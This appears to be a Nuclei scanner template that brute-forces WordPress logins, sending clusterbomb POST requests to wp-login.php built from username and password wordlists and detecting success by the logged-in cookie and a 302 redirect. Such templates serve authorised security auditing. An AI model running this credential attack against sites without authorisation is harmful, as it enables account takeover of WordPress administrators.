id: wordpress-weak-credentials info: name: WordPress - Weak Credentials author: evolutionsec severity: critical description: | Weak WordPress Credentials were discovered. reference: - https://www.wpwhitesecurity.com/strong-wordpress-passwords-wpscan/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cwe-id: CWE-1391 metadata: max-request: 276 tags: wordpress,default-login,fuzz,fuzzing http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded Referer: {{BaseURL}} log={{users}}&pwd={{passwords}} attack: clusterbomb payloads: users: helpers/wordlists/wp-users.txt passwords: helpers/wordlists/wp-passwords.txt stop-at-first-match: true matchers-condition: and matchers: - type: word part: header words: - '/wp-admin' - 'wordpress_logged_in' condition: and - type: status status: - 302 # digest: 4b0a00483046022100b1bcc0dde728ed3c43e26da85c807d420bacaf90ac5fdfe4f06c24facc9fb37b022100e3b78179764d2a5b79b29e6187d1d2d2c5460379765173062e9afd30eb76fba0:922c64590222798bb761d5b6d8e72950